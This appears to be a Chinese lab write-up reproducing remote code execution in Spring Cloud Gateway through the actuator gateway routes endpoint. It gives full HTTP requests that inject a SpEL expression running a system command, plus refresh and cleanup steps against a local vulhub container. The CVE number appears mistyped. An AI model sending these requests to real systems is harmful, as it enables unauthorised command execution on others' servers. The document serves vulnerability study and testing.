一、影响范围
Spring Cloud Gateway < 3.1.1
Spring Cloud Gateway < 3.0.7
Spring Cloud Gateway 其他已不再更新的版本
二、环境搭建
在线环境可以利用vulfocus中的对应靶场环境进行复现,本地环境可以利用vulfocus或者vulhub中的对应的环境进行复现,此处讲述vulhub环境搭建过程(docker以及docker-compose安装过程请移步百度)
git clone https://github.com/vulhub/vulhub.git #从GitHub拉取vulhubcd spring/CVE-2022-229947/docker-compose up -d #启动docker环境
如果GitHub访问比较环境可以直接本地环境创建docker-compose.yml文件,源码如下
version: '2'services:spring:image: vulhub/spring-cloud-gateway:3.1.0ports:"28080:8080"
docker-compose.yml代码来源vulhub
此处为了避免默认映射端口与burpsuite监听端口冲突将本地映射端口修改为28080
三、漏洞复现
首先添加包含恶意SpEl表达式的路由
POST /actuator/gateway/routes/we1x4n HTTP/1.1Host: localhost:28080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 329{"id": "we1x4n","filters": [{"name": "AddResponseHeader","args": {"name": "Result","value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{"id"}).getInputStream()))}"}}],"uri": "http://example.com"}
刷新路由网关
POST /actuator/gateway/refresh HTTP/1.1Host: localhost:28080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 0
访问刚添加的路由地址可以查看到命令执行结果
GET /actuator/gateway/routes/we1x4n HTTP/1.1Host: localhost:28080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 0
执行结束后删除添加的路由
DELETE /actuator/gateway/routes/we1x4n HTTP/1.1Host: localhost:28080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 0
然后再次刷新
POST /actuator/gateway/refresh HTTP/1.1Host: localhost:28080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeContent-Type: application/jsonContent-Length: 0
原文始发于微信公众号(we1x4n):Spring Cloud Gateway远程代码执行漏洞(CVE-2022-229947)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论